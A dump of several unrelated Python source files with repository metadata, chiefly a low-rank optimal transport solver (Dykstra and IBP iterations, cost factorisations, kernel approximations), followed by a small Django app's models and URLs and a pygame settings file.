max_iter=max_iter_Update,
delta=delta_Update,
lam=lam_Update,
)
# Update the Hubs
Z = UpdateHubs(X, Y, gamma1, gamma2)
# Update the total cost
C_trans = np.dot(C, gamma2.T)
C_trans = C_trans / w
G = np.dot(gamma1, C_trans)
OT_trans = np.trace(G)
if niter > 10:
## Update the error
err = np.abs(OT_trans - acc[-1]) / acc[-1]
if np.isnan(err):
print("Error computation of the stopping criterion", niter)
gamma1 = gamma1_prev
gamma2 = gamma2_prev
w = w_prev
break
if np.isnan(OT_trans) == True:
print("Error: NaN OT value")
return "Error"
else:
acc.append(OT_trans)
end = time.time()
tim_actual = end - start
times.append(tim_actual)
if tim_actual > time_out:
return (
acc[-1],
np.array(acc),
np.array(times),
gamma1.T,
gamma2.T,
w,
)
else:
return acc[-1], np.array(acc), np.array(times), gamma1.T, gamma2.T, w
return acc[-1], np.array(acc), np.array(times), gamma1.T, gamma2.T, w
def LR_Dykstra_Sin(K1, K2, K3, a, b, alpha, max_iter=1000, delta=1e-9, lam=0):
Q = K1
R = K2
g_old = K3
r = np.shape(K3)[0]
v1_old, v2_old = np.ones(r), np.ones(r)
u1, u2 = np.ones(np.shape(a)[0]), np.ones(np.shape(b)[0])
q_gi, q_gp = np.ones(r), np.ones(r)
q_Q, q_R = np.ones(r), np.ones(r)
err = 1
n_iter = 0
while n_iter < max_iter:
u1_prev, v1_prev = u1, v1_old
u2_prev, v2_prev = u2, v2_old
g_prev = g_old
if err > delta:
n_iter = n_iter + 1
# First Projection
u1 = a / (np.dot(K1, v1_old) + lam)
u2 = b / (np.dot(K2, v2_old) + lam)
g = np.maximum(alpha, g_old * q_gi)
q_gi = (g_old * q_gi) / (g + lam)
g_old = g.copy()
# Second Projection
v1_trans = np.dot(K1.T, u1)
v2_trans = np.dot(K2.T, u2)
g = (g_old * q_gp * v1_old * q_Q * v1_trans * v2_old * q_R * v2_trans) ** (
1 / 3
)
v1 = g / (v1_trans + lam)
v2 = g / (v2_trans + lam)
q_gp = (g_old * q_gp) / (g + lam)
q_Q = (q_Q * v1_old) / (v1 + lam)
q_R = (q_R * v2_old) / (v2 + lam)
v1_old = v1.copy()
v2_old = v2.copy()
g_old = g.copy()
# Update the error
u1_trans = np.dot(K1, v1)
err_1 = np.sum(np.abs(u1 * u1_trans - a))
u2_trans = np.dot(K2, v2)
err_2 = np.sum(np.abs(u2 * u2_trans - b))
err = err_1 + err_2
if (
np.any(np.isnan(u1))
or np.any(np.isnan(v1))
or np.any(np.isnan(u2))
or np.any(np.isnan(v2))
or np.any(np.isinf(u1))
or np.any(np.isinf(v1))
or np.any(np.isinf(u2))
or np.any(np.isinf(v2))
):
# we have reached the machine precision
# come back to previous solution and quit loop
print("Warning: numerical errors at iteration", n_iter)
u1, v1 = u1_prev, v1_prev
u2, v2 = u2_prev, v2_prev
g = g_prev
break
else:
Q = u1.reshape((-1, 1)) * K1 * v1.reshape((1, -1))
R = u2.reshape((-1, 1)) * K2 * v2.reshape((1, -1))
return Q, R, g
Q = u1.reshape((-1, 1)) * K1 * v1.reshape((1, -1))
R = u2.reshape((-1, 1)) * K2 * v2.reshape((1, -1))
return Q, R, g
def LR_Dykstra_LSE_Sin(
C1, C2, C3, a, b, alpha, gamma, max_iter=1000, delta=1e-9, lam=0
):
h_old = C3
r = np.shape(C3)[0]
g1_old, g2_old = np.zeros(r), np.zeros(r)
f1, f2 = np.zeros(np.shape(a)[0]), np.zeros(np.shape(b)[0])
w_gi, w_gp = np.zeros(r), np.zeros(r)
w_Q, w_R = np.zeros(r), np.zeros(r)
err = 1
n_iter = 0
while n_iter < max_iter:
f1_prev, g1_prev = f1, g1_old
f2_prev, g2_prev = f2, g2_old
h_prev = h_old
if err > delta:
n_iter = n_iter + 1
# First Projection
C1_tilde = f1[:, None] + g1_old[None, :] - C1 # 2 * n * r
C1_tilde = C1_tilde * gamma # n * r
f1 = (
(1 / gamma) * np.log(a)
+ f1
- (1 / gamma) * scipy.special.logsumexp(C1_tilde, axis=1)
) # 2 * n + 2 * n + n * r
C2_tilde = f2[:, None] + g2_old[None, :] - C2 # 2 * m * r
C2_tilde = C2_tilde * gamma # m * r
f2 = (
(1 / gamma) * np.log(b)
+ f2
- (1 / gamma) * scipy.special.logsumexp(C2_tilde, axis=1)
) # 2 * m + 2 * m + m * r
h = h_old + w_gi # 2 * r
h = np.maximum((np.log(alpha) / gamma), h) # r
w_gi = h_old + w_gi - h # 2 * r
h_old = h.copy()
# Update couplings
C1_tilde = f1[:, None] + g1_old[None, :] - C1 # 2 * n * r
C1_tilde = C1_tilde * gamma # n * r
alpha_1_trans = scipy.special.logsumexp(C1_tilde, axis=0) # n * r
C2_tilde = f2[:, None] + g2_old[None, :] - C2 # 2 * m * r
C2_tilde = C2_tilde * gamma # m * r
alpha_2_trans = scipy.special.logsumexp(C2_tilde, axis=0) # m * r
# Second Projection
h = (1 / 3) * (h_old + w_gp + w_Q + w_R) # 4 * r
h = h + (1 / (3 * gamma)) * alpha_1_trans # 2 * r
h = h + (1 / (3 * gamma)) * alpha_2_trans # 2 * r
g1 = h + g1_old - (1 / gamma) * alpha_1_trans # 3 * r
g2 = h + g2_old - (1 / gamma) * alpha_2_trans # 3 * r
w_Q = w_Q + g1_old - g1 # 2 * r
w_R = w_R + g2_old - g2 # 2 * r
w_gp = h_old + w_gp - h # 2 * r
g1_old = g1.copy()
g2_old = g2.copy()
h_old = h.copy()
# Update couplings
C1_tilde = f1[:, None] + g1_old[None, :] - C1 # 2 * n * r
C1_tilde = C1_tilde * gamma # n * r
Q = np.exp(C1_tilde) # n * r
C2_tilde = f2[:, None] + g2_old[None, :] - C2 # 2 * n * r
C2_tilde = C2_tilde * gamma # n * r
R = np.exp(C2_tilde) # n * r
g = np.exp(gamma * h) # 2 * r
# Update the error
err_1 = np.sum(np.abs(np.sum(Q, axis=1) - a))
err_2 = np.sum(np.abs(np.sum(R, axis=1) - b))
err = err_1 + err_2
if (
np.any(np.isnan(f1))
or np.any(np.isnan(g1))
or np.any(np.isnan(f2))
or np.any(np.isnan(g2))
or np.any(np.isinf(f1))
or np.any(np.isinf(g1))
or np.any(np.isinf(f2))
or np.any(np.isinf(g2))
):
# we have reached the machine precision
# come back to previous solution and quit loop
print("Warning: numerical errors at iteration", n_iter)
f1, g1 = f1_prev, g1_prev
f2, g2 = f2_prev, g2_prev
h = h_prev
# Update couplings
C1_tilde = f1[:, None] + g1_old[None, :] - C1
C1_tilde = C1_tilde * gamma
Q = np.exp(C1_tilde)
C2_tilde = f2[:, None] + g2_old[None, :] - C2
C2_tilde = C2_tilde * gamma
R = np.exp(C2_tilde)
g = np.exp(gamma * h)
return Q, R, g
else:
return Q, R, g
return Q, R, g
def LR_IBP_Sin(K1, K2, K3, a, b, max_iter=1000, delta=1e-9, lam=0):
Q = K1
R = K2
g = K3
r = np.shape(K3)[0]
v1, v2 = np.ones(r), np.ones(r)
u1, u2 = np.ones(np.shape(a)[0]), np.ones(np.shape(a)[0])
u1_trans = np.dot(K1, v1) # n * r
u2_trans = np.dot(K2, v2) # m * r
err = 1
n_iter = 0
while n_iter < max_iter:
u1_prev, v1_prev = u1, v1
u2_prev, v2_prev = u2, v2
g_prev = g
if err > delta:
n_iter = n_iter + 1
# Update u1
u1 = a / u1_trans # n
v1_trans = np.dot(K1.T, u1) # n * r
# Update u2
u2 = a / u2_trans # m
v2_trans = np.dot(K2.T, u2) # m * r
# Update g
g = (g * v1 * v1_trans * v2 * v2_trans) ** (1 / 3) # 5 * r
# Update v1
v1 = g / v1_trans # r
# Update v2
v2 = g / v2_trans # r
# Update the error
u1_trans = np.dot(K1, v1)
err_1 = np.sum(np.abs(u1 * u1_trans - a))
u2_trans = np.dot(K2, v2)
err_2 = np.sum(np.abs(u2 * u2_trans - b))
err = err_1 + err_2
if (
np.any(np.isnan(u1))
or np.any(np.isnan(v1))
or np.any(np.isnan(u2))
or np.any(np.isnan(v2))
or np.any(np.isinf(u1))
or np.any(np.isinf(v1))
or np.any(np.isinf(u2))
or np.any(np.isinf(v2))
):
# we have reached the machine precision
# come back to previous solution and quit loop
print("Warning: numerical errors at iteration", n_iter)
u1, v1 = u1_prev, v1_prev
u2, v2 = u2_prev, v2_prev
g = g_prev
break
else:
Q = u1.reshape((-1, 1)) * K1 * v1.reshape((1, -1))
R = u2.reshape((-1, 1)) * K2 * v2.reshape((1, -1))
return Q, R, g
Q = u1.reshape((-1, 1)) * K1 * v1.reshape((1, -1))
R = u2.reshape((-1, 1)) * K2 * v2.reshape((1, -1))
return Q, R, g
# If C_init == True: cost is the cost matrix
# If C_init == False: cost is the cost function
# Init == 'trivial', 'random', 'kmeans
def Quad_LOT_MD(
X,
Y,
a,
b,
rank,
reg,
alpha,
cost,
Init="trivial",
seed_init=49,
C_init=False,
reg_init=1e-3,
gamma_init="theory",
gamma_0=1e-1,
method="IBP",
max_iter=1000,
delta=1e-3,
max_iter_IBP=1000,
delta_IBP=1e-9,
lam_IBP=0,
time_out=200,
):
start = time.time()
acc = []
times = []
n, m = np.shape(a)[0], np.shape(b)[0]
if C_init == False:
C = cost(X, Y)
else:
C = cost
if len(C) == 2:
print("Error: cost not adapted")
return "Error"
#### Initialization #####
if Init == "kmeans":
## Init with K-means
g = np.ones(rank) / rank
kmeans = KMeans(n_clusters=rank, random_state=0).fit(X)
Z = kmeans.cluster_centers_
gamma1, gamma2, g = UpdatePlans(
X,
Y,
Z,
a,
b,
reg_init,
cost,
max_iter=max_iter_IBP,
delta=delta_IBP,
lam=lam_IBP,
)
Q, R = gamma1.T, gamma2.T
# Init random
if Init == "random":
np.random.seed(seed_init)
g = np.abs(np.random.randn(rank))
g = g + 1 # r
g = g / np.sum(g) # r
seed_init = seed_init + 1000
np.random.seed(seed_init)
Q = np.abs(np.random.randn(n, rank))
Q = Q + 1 # n * r
Q = (Q.T * (a / np.sum(Q, axis=1))).T # n + n * r
seed_init = seed_init + 1000
np.random.seed(seed_init)
R = np.abs(np.random.randn(m, rank))
R = R + 1 # m * r
R = (R.T * (b / np.sum(R, axis=1))).T # m + m * r
### Trivial Init
if Init == "trivial":
g = np.ones(rank) / rank # r
lambda_1 = min(np.min(a), np.min(g), np.min(b)) / 2
a1 = np.arange(1, np.shape(a)[0] + 1)
a1 = a1 / np.sum(a1) # n
a2 = (a - lambda_1 * a1) / (1 - lambda_1) # 2 * n
b1 = np.arange(1, np.shape(b)[0] + 1)
b1 = b1 / np.sum(b1) # m
b2 = (b - lambda_1 * b1) / (1 - lambda_1) # 2 * m
g1 = np.arange(1, rank + 1)
g1 = g1 / np.sum(g1) # r
g2 = (g - lambda_1 * g1) / (1 - lambda_1) # 2 * r
Q = lambda_1 * np.dot(a1[:, None], g1.reshape(1, -1)) + (1 - lambda_1) * np.dot(
a2[:, None], g2.reshape(1, -1) # 4 * n * r
)
R = lambda_1 * np.dot(b1[:, None], g1.reshape(1, -1)) + (1 - lambda_1) * np.dot(
b2[:, None], g2.reshape(1, -1) # 4 * m * r
)
if gamma_init == "theory":
L_trans = (2 / (alpha) ** 4) * (np.linalg.norm(C) ** 2)
L_trans = L_trans + ((reg + 2 * np.linalg.norm(C)) / (alpha ** 3)) ** 2
L = np.sqrt(3 * L_trans)
gamma = 1 / L
if gamma_init == "regularization":
gamma = 1 / reg
if gamma_init == "arbitrary":
gamma = gamma_0
err = 1
niter = 0
while niter < max_iter:
Q_prev = Q
R_prev = R
g_prev = g
if err > delta:
niter = niter + 1
K1_trans_0 = np.dot(C, R) # n * m * r
C1_trans = K1_trans_0 / g + (reg - (1 / gamma)) * np.log(Q) # 3 * n * r
K2_trans_0 = np.dot(C.T, Q) # m * n * r
C2_trans = K2_trans_0 / g + (reg - (1 / gamma)) * np.log(R) # 3 * m * r
omega = np.diag(np.dot(Q.T, K1_trans_0)) # r * n * r
C3_trans = omega / (g ** 2) - (reg - (1 / gamma)) * np.log(g) # 4 * r
# Update the coupling
if method == "IBP":
K1 = np.exp((-gamma) * C1_trans)
K2 = np.exp((-gamma) * C2_trans)
K3 = np.exp(gamma * C3_trans)
Q, R, g = LR_IBP_Sin(
K1,
K2,
K3,
a,
b,
max_iter=max_iter_IBP,
delta=delta_IBP,
lam=lam_IBP,
)
if method == "Dykstra":
K1 = np.exp((-gamma) * C1_trans)
K2 = np.exp((-gamma) * C2_trans)
K3 = np.exp(gamma * C3_trans)
Q, R, g = LR_Dykstra_Sin(
K1,
K2,
K3,
a,
b,
alpha,
max_iter=max_iter_IBP,
delta=delta_IBP,
lam=lam_IBP,
)
if method == "Dykstra_LSE":
Q, R, g = LR_Dykstra_LSE_Sin(
C1_trans,
C2_trans,
C3_trans,
a,
b,
alpha,
gamma,
max_iter=max_iter_IBP,
delta=delta_IBP,
lam=lam_IBP,
)
# Update the total cost
C_trans = np.dot(C, R)
C_trans = C_trans / g
G = np.dot(Q.T, C_trans)
OT_trans = np.trace(G)
if niter > 10:
## Update the error: Practical error
err = np.abs(OT_trans - acc[-1]) / acc[-1]
if np.isnan(err):
print("Error computation of the stopping criterion", niter)
Q = Q_prev
R = R_prev
g = g_prev
break
if np.isnan(OT_trans) == True:
print("Error: NaN OT value")
return "Error"
else:
acc.append(OT_trans)
end = time.time()
tim_actual = end - start
times.append(tim_actual)
if tim_actual > time_out:
return (
acc[-1],
np.array(acc),
np.array(times),
Q,
R,
g,
)
else:
return (
acc[-1],
np.array(acc),
np.array(times),
Q,
R,
g,
)
return acc[-1], np.array(acc), np.array(times), Q, R, g
# gamma_init = 'theory', 'regularization', 'arbitrary'
# method = 'IBP', 'Dykstra', 'Dykstra_LSE'
# If C_init = True: cost_factorized = C1,C2
# If C_init = False: cost_factorized is a function
# Init = 'trivial', kmeans', 'random'
def Lin_LOT_MD(
X,
Y,
a,
b,
rank,
reg,
alpha,
cost,
cost_factorized,
Init="trivial",
seed_init=49,
C_init=False,
reg_init=1e-1,
gamma_init="theory",
gamma_0=1e-1,
method="IBP",
max_iter=1000,
delta=1e-3,
max_iter_IBP=1000,
delta_IBP=1e-9,
lam_IBP=0,
time_out=200,
):
start = time.time()
acc = []
times = []
n, m = np.shape(a)[0], np.shape(b)[0]
if C_init == False:
C = cost_factorized(X, Y)
if len(C) == 2:
C1, C2 = C
else:
print("Error: cost not adapted")
return "Error"
else:
C1, C2 = cost_factorized
n, d = np.shape(C1)
########### Initialization ###########
## Init with K-means
if Init == "kmeans":
g = np.ones(rank) / rank
kmeans = KMeans(n_clusters=rank, random_state=0).fit(X)
Z = kmeans.cluster_centers_
gamma1, gamma2, g, count_op_Barycenter = UpdatePlans(
X,
Y,
Z,
a,
b,
reg_init,
cost,
max_iter=max_iter_IBP,
delta=delta_IBP,
lam=lam_IBP,
)
Q, R = gamma1.T, gamma2.T
## Init random
if Init == "random":
np.random.seed(seed_init)
g = np.abs(np.random.randn(rank))
g = g + 1
g = g / np.sum(g)
n, d = np.shape(X)
m, d = np.shape(Y)
seed_init = seed_init + 1000
np.random.seed(seed_init)
Q = np.abs(np.random.randn(n, rank))
Q = Q + 1
Q = (Q.T * (a / np.sum(Q, axis=1))).T
seed_init = seed_init + 1000
np.random.seed(seed_init)
R = np.abs(np.random.randn(m, rank))
R = R + 1
R = (R.T * (b / np.sum(R, axis=1))).T
## Init trivial
if Init == "trivial":
g = np.ones(rank) / rank
lambda_1 = min(np.min(a), np.min(g), np.min(b)) / 2
a1 = np.arange(1, np.shape(a)[0] + 1)
a1 = a1 / np.sum(a1)
a2 = (a - lambda_1 * a1) / (1 - lambda_1)
b1 = np.arange(1, np.shape(b)[0] + 1)
b1 = b1 / np.sum(b1)
b2 = (b - lambda_1 * b1) / (1 - lambda_1)
g1 = np.arange(1, rank + 1)
g1 = g1 / np.sum(g1)
g2 = (g - lambda_1 * g1) / (1 - lambda_1)
Q = lambda_1 * np.dot(a1[:, None], g1.reshape(1, -1)) + (1 - lambda_1) * np.dot(
a2[:, None], g2.reshape(1, -1)
)
R = lambda_1 * np.dot(b1[:, None], g1.reshape(1, -1)) + (1 - lambda_1) * np.dot(
b2[:, None], g2.reshape(1, -1)
)
#####################################
if gamma_init == "theory":
L_trans = (
(2 / (alpha) ** 4) * (np.linalg.norm(C1) ** 2) * (np.linalg.norm(C1) ** 2)
)
L_trans = (
L_trans
+ ((reg + 2 * np.linalg.norm(C1) * np.linalg.norm(C1)) / (alpha ** 3)) ** 2
)
L = np.sqrt(3 * L_trans)
gamma = 1 / L
print(gamma)
if gamma_init == "regularization":
gamma = 1 / reg
if gamma_init == "arbitrary":
gamma = gamma_0
err = 1
niter = 0
while niter < max_iter:
Q_prev = Q
R_prev = R
g_prev = g
if err > delta:
niter = niter + 1
K1_trans_0 = np.dot(C2, R) # d * m * r
K1_trans_0 = np.dot(C1, K1_trans_0) # n * d * r
C1_trans = K1_trans_0 / g + (reg - (1 / gamma)) * np.log(Q) # 3 * n * r
K2_trans_0 = np.dot(C1.T, Q) # d * n * r
K2_trans_0 = np.dot(C2.T, K2_trans_0) # m * d * r
C2_trans = K2_trans_0 / g + (reg - (1 / gamma)) * np.log(R) # 3 * m * r
omega = np.diag(np.dot(Q.T, K1_trans_0)) # r * n * r
C3_trans = (omega / (g ** 2)) - (reg - (1 / gamma)) * np.log(g) # 4 * r
# Update the coupling
if method == "IBP":
K1 = np.exp((-gamma) * C1_trans)
K2 = np.exp((-gamma) * C2_trans)
K3 = np.exp(gamma * C3_trans)
Q, R, g = LR_IBP_Sin(
K1,
K2,
K3,
a,
b,
max_iter=max_iter_IBP,
delta=delta_IBP,
lam=lam_IBP,
)
if method == "Dykstra":
K1 = np.exp((-gamma) * C1_trans)
K2 = np.exp((-gamma) * C2_trans)
K3 = np.exp(gamma * C3_trans)
Q, R, g = LR_Dykstra_Sin(
K1,
K2,
K3,
a,
b,
alpha,
max_iter=max_iter_IBP,
delta=delta_IBP,
lam=lam_IBP,
)
if method == "Dykstra_LSE":
Q, R, g = LR_Dykstra_LSE_Sin(
C1_trans,
C2_trans,
C3_trans,
a,
b,
alpha,
gamma,
max_iter=max_iter_IBP,
delta=delta_IBP,
lam=lam_IBP,
)
# Update the total cost
# Metric used in the MIT paper: useless
# OT_trans = compute_SE_OT(X,Y,Q,R,g)
# Classical OT cost
C_trans = np.dot(C2, R)
C_trans = np.dot(C1, C_trans)
C_trans = C_trans / g
G = np.dot(Q.T, C_trans)
OT_trans = np.trace(G)
if niter > 10:
## Update the error: theoritical error
# err_1 = ((1/gamma)**2) * (KL(Q,Q_prev) + KL(Q_prev,Q))
# err_2 = ((1/gamma)**2) * (KL(R,R_prev) + KL(R_prev,R))
# err_3 = ((1/gamma)**2) * (KL(g,g_prev) + KL(g_prev,g))
# err = err_1 + err_2 + err_3
## Update the error: Practical error
err = np.abs(OT_trans - acc[-1]) / acc[-1]
if np.isnan(err):
print("Error computation of the stopping criterion", niter)
Q = Q_prev
R = R_prev
g = g_prev
break
if np.isnan(OT_trans) == True:
print("Error: NaN OT value")
return "Error"
else:
acc.append(OT_trans)
end = time.time()
tim_actual = end - start
times.append(end - start)
if tim_actual > time_out:
return (
acc[-1],
np.array(acc),
np.array(times),
Q,
R,
g,
)
else:
return (
acc[-1],
np.array(acc),
np.array(times),
Q,
R,
g,
)
return acc[-1], np.array(acc), np.array(times), Q, R, g
#################### Cost Matrix #####################
def Square_Euclidean_Distance(X, Y):
"""Returns the matrix of $|x_i-y_j|^2$."""
X_col = X[:, np.newaxis]
Y_lin = Y[np.newaxis, :]
C = np.sum((X_col - Y_lin) ** 2, 2)
return C
# shape of xs: num_samples * dimension
def factorized_square_Euclidean(xs, xt):
square_norm_s = np.sum(xs ** 2, axis=1) # 2 * n * d
square_norm_t = np.sum(xt ** 2, axis=1) # 2 * m * d
A_1 = np.zeros((np.shape(xs)[0], 2 + np.shape(xs)[1]))
A_1[:, 0] = square_norm_s
A_1[:, 1] = np.ones(np.shape(xs)[0])
A_1[:, 2:] = -2 * xs # n * d
A_2 = np.zeros((2 + np.shape(xs)[1], np.shape(xt)[0]))
A_2[0, :] = np.ones(np.shape(xt)[0])
A_2[1, :] = square_norm_t
A_2[2:, :] = xt.T
return A_1, A_2
def Euclidean_Distance(X, Y):
X_col = X[:, np.newaxis]
Y_lin = Y[np.newaxis, :]
C = np.sum((X_col - Y_lin) ** 2, 2)
C = np.sqrt(C)
return C
def Lp_Distance(X, Y, p=1):
X_col = X[:, np.newaxis]
Y_lin = Y[np.newaxis, :]
C = np.sum(np.abs(X_col - Y_lin) ** p, 2)
C = C ** (1 / p)
return C
def Learning_linear_subspace(X, Y, cost, U, C_init=False, tol=1e-3):
rank, m = np.shape(U)
U_sym = np.dot(U, U.T) # k x k
d, v = np.linalg.eigh(U_sym)
v = v / np.sqrt(d) # k x k
ind_column = np.random.choice(m, size=int(rank / tol))
U_trans = U[:, ind_column] # k x k/tol
if C_init == False:
A_trans = cost(X, Y[ind_column, :])
else:
A_trans = cost[:, ind_column] # n x k/tol
A_trans = (1 / np.sqrt(int(rank / tol))) * A_trans
B = (1 / np.sqrt(int(rank / tol))) * np.dot(v.T, U_trans) # k x k/tol
Mat = np.linalg.inv(np.dot(B, B.T))
Mat = np.dot(Mat, B) # k x k/tol
alpha = np.dot(Mat, A_trans.T) # k x n
V_f = np.dot(alpha.T, v.T)
return V_f
# If C_init == True: cost is the Matrix
# If C_init == False: cost is the Function
def factorized_distance_cost(X, Y, rank, cost, C_init=False, tol=1e-3, seed=49):
np.random.seed(seed)
if C_init == False:
n, m = np.shape(X)[0], np.shape(Y)[0]
else:
n, m = np.shape(cost)
i_ = np.random.randint(n, size=1)
j_ = np.random.randint(m, size=1)
if C_init == False:
X_trans = X[i_, :].reshape(1, -1)
cost_trans_i = cost(X_trans, Y)
mean = np.mean(cost_trans_i ** 2)
else:
cost_trans_i = cost[i_, :]
mean = np.mean(cost_trans_i ** 2)
if C_init == False:
Y_trans = Y[j_, :].reshape(1, -1)
cost_trans_j = cost(X, Y_trans)
else:
cost_trans_j = cost[:, j_]
p_row = cost_trans_j ** 2 + cost_trans_i[0, j_] ** 2 + mean
p_row = p_row / np.sum(p_row) # vector of size n
# Compute S
ind_row = np.random.choice(n, size=int(rank / tol), p=p_row.reshape(-1))
if C_init == False:
S = cost(X[ind_row, :], Y) # k/tol x m
else:
S = cost[ind_row, :]
p_row_sub = p_row[ind_row]
S = S / np.sqrt(int(rank / tol) * p_row_sub)
norm_square_S = np.sum(S ** 2)
p_column = np.zeros(m)
for j in range(m):
p_column[j] = np.sum(S[:, j] ** 2) / norm_square_S
# p_column = p_column / np.sum(p_column) # vector of size m
# Compute W
ind_column = np.random.choice(m, size=int(rank / tol), p=p_column.reshape(-1))
W = S[:, ind_column] # k/tol x k/tol
p_column_sub = p_column[ind_column]
W = (W.T / np.sqrt(int(rank / tol) * p_column_sub)).T
# Compute U
u, d, v = np.linalg.svd(W)
U = u[:, :rank] # k/tol x k
U_trans = np.dot(W.T, U) # k/tol x k
norm_U = np.sum(U_trans ** 2, axis=0)
norm_U = np.sqrt(norm_U)
U = np.dot(S.T, U) # m x k
U = U / norm_U
# Compute V
V = Learning_linear_subspace(X, Y, cost, U.T, C_init=C_init, tol=tol)
return V, U.T
# Approximate the kernel k(x,y) = exp(TU/\varepsilon)
def RF_Approx(T, U, reg, num_samples=100, seed=49):
R = np.minimum(theoritical_R(T, U.T), 100)
A = Feature_Map_Gaussian(T, reg, R, num_samples=num_samples, seed=seed)
B = Feature_Map_Gaussian(U.T, reg, R, num_samples=num_samples, seed=seed).T
n, d = np.shape(T)
m, d = np.shape(U.T)
return A, B
def theoritical_R(X, Y):
norm_X = np.linalg.norm(X, axis=1) # n * d
norm_Y = np.linalg.norm(Y, axis=1) # m * d
norm_max = np.maximum(np.max(norm_X), np.max(norm_Y)) # n + m
return norm_max
## Feature map of k(x,y) = exp(\langle x,y\rangle/\varepsilon) ##
def Feature_Map_Gaussian(X, reg, R, num_samples=100, seed=49, tresh=700):
n, d = np.shape(X)
y = R ** 2 / (2 * reg * d)
q = np.real((1 / 2) * np.exp(special.lambertw(y)))
C = (2 * q) ** (d / 4)
var = (q * reg) / 2
np.random.seed(seed)
U = np.random.multivariate_normal(np.zeros(d), var * np.eye(d), num_samples)
SED = Square_Euclidean_Distance(X, U) # d * n * num_samples
W = -(SED) / reg # n * num_samples
V = np.sum(U ** 2, axis=1) / (2 * reg * q) # num_samples * d + num_samples
Z = np.sum(X ** 2, axis=1) / (2 * reg) # n * d + n
res_trans = V + W # n * num_samples
res_trans = np.minimum((Z + res_trans.T).T, tresh) # 2 * n * num_samples
res_trans = C * np.exp(res_trans) # 2 * n * num_samples
res = (1 / np.sqrt(num_samples)) * res_trans # n * num_samples
return res
# Uniform Random Nyström
# Here we approximate the SDP matrix exp(XX.T/\varepsilon)
def Nys_approx(X, Y, reg, rank, seed=49, stable=1e-10):
n, d = np.shape(X)
m, d = np.shape(Y)
n_tot = n + m
Z = np.concatenate((X, Y), axis=0)
rank_trans = int(np.minimum(rank, n_tot))
np.random.seed(seed)
ind = np.random.choice(n_tot, rank_trans, replace=False)
ind = np.sort(ind)
Z_1 = Z[ind, :]
A = np.exp(np.dot(Z_1, Z_1.T) / reg)
A = A + stable * np.eye(rank_trans)
V = np.exp(np.dot(Z, Z_1.T) / reg)
return A, V
| [
"mscetbon@ens-paris-saclay.fr"
] | mscetbon@ens-paris-saclay.fr |
f89dbf512849258484575327a254d71329f70ec0 | fe5d970498e3b5a31178f5df72fa02d6c5add884 | /Lab_2/taks1/Domain/Drone/__init__.py | 92365fb7a14f8e1bbe3c986fbb886738d7a597ec | [] | no_license | AndreiZavo/Artificial-Intelligence | ca045c77bbcb6ad2d50f3e80a55f9117888bd450 | 40444f23a13fb5226e5a79293eb4624aee946cbf | refs/heads/main | 2023-04-01T21:56:33.053913 | 2021-04-10T17:52:04 | 2021-04-10T17:52:04 | 347,122,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21 | py | from .Drone import *
| [
"andrei_lucian01@yahoo.com"
] | andrei_lucian01@yahoo.com |
7d694881d590f7fe45d3be9f6d9c0c180d407993 | 0049d7959ff872e2ddf6ea3ce83b6c26512425a6 | /django_demo_applications/djangoprojectsot/modelinheritanceproject/testapp/models.py | 2ba2ba663d87e53e60132476cad2e672ab93660a | [] | no_license | srazor09/Django_projects | 9806ab25d966af780cdabe652a1792220c7806a8 | 8d664ba4c9478bd93c8e5bcbcaf594e8ffe6ce93 | refs/heads/master | 2023-04-18T02:13:15.993393 | 2021-05-04T20:34:05 | 2021-05-04T20:34:05 | 364,379,605 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | from django.db import models
# Create your models here.
# class ContactInfo1(models.Model):
# name=models.CharField(max_length=64)
# email=models.EmailField()
# address=models.CharField(max_length=264)
#
# class Student1(ContactInfo1):
# rollno=models.IntegerField()
# marks=models.IntegerField()
#
# class Teacher1(ContactInfo1):
# subject=models.CharField(max_length=264)
# salary=models.FloatField()
class BasicModel(models.Model):
f1=models.CharField(max_length=64)
f2=models.CharField(max_length=64)
f3=models.CharField(max_length=64)
class StandardModel(BasicModel):
f4=models.CharField(max_length=64)
f5=models.CharField(max_length=64)
| [
"sourabhaws09@gmail.com"
] | sourabhaws09@gmail.com |
5b84d20e2ac52bc2051118bcec24336ace41a489 | 9ce64348ece747953cbd85a91ca95deb2e7f45ad | /events/urls.py | bb928607ecd2b1543c722c2bf2865314205c8fcb | [] | no_license | julianrofrano-eb/todo-list | 521a29808e8c0c05f478ba9b77aa382211a9bbfb | 06be26b0808da0806def4a131922d0ce8ffa953c | refs/heads/master | 2023-01-11T19:37:21.784433 | 2019-09-04T14:52:18 | 2019-09-04T14:52:18 | 206,325,749 | 0 | 0 | null | 2023-01-04T08:56:56 | 2019-09-04T13:27:51 | JavaScript | UTF-8 | Python | false | false | 723 | py | from django.conf.urls import url, include
from django.contrib.auth import views as auth_views
from . import views
urlpatterns = [
url('(?P<event_id>[0-9]+)/task/complete/(?P<pk>[0-9]+)/$', views.complete_task, name='task-complete'),
url('(?P<event_id>[0-9]+)/task/delete/(?P<pk>[0-9]+)/$', views.TaskDelete.as_view(), name='task-delete'),
url('(?P<event_id>[0-9]+)/task/update/(?P<pk>[0-9]+)/$', views.TaskUpdate.as_view(), name='task-update'),
url('(?P<event_id>[0-9]+)/task/create/', views.EventTaskCreate.as_view(), name='task-create-event'),
url('(?P<event_id>[0-9]+)/tasks/', views.ListTasksEvent.as_view(), name='list-tasks-event'),
url('', views.ListEvents.as_view(), name='event-list'),
]
| [
"julian.rofrano@julian.rofrano-07322"
] | julian.rofrano@julian.rofrano-07322 |
0790ec119fc1b814c8df24850e63b50d09c127ef | b3d28cc90fb2fbb3efe177c6ee5ac6077175c79f | /settings.py | 2e833405aef60e6d0673de39b2568ed9a5ef71f6 | [] | no_license | DiviLOL/Zobmie-shooter | b7a708312be3d75d163c44a9280ee11644f487d7 | 1aa4c844cd06d169b8a251f5da4a2302e7eb2381 | refs/heads/main | 2023-08-24T09:13:31.339750 | 2021-10-06T10:10:40 | 2021-10-06T10:10:40 | 414,154,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,863 | py | import pygame as py
import random
vec = py.math.Vector2
# define some colors (R, G, B)
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
DARKGREY = (40, 40, 40)
LIGHTGREY = (100, 100, 100)
GREEN = (0, 255, 0)
RED = (255, 0, 0)
YELLOW = (255, 255, 0)
BROWN = (106,55,5)
# game settings
WIDTH = 1376 # or 1,376
HEIGHT = 100 * 9 # or 900
FPS = 60
TITLE = "Tilemap Demo"
BGCOLOR = BROWN
TILESIZE = 64
GRIDWIDTH = WIDTH / TILESIZE
GRIDHEIGHT = HEIGHT / TILESIZE
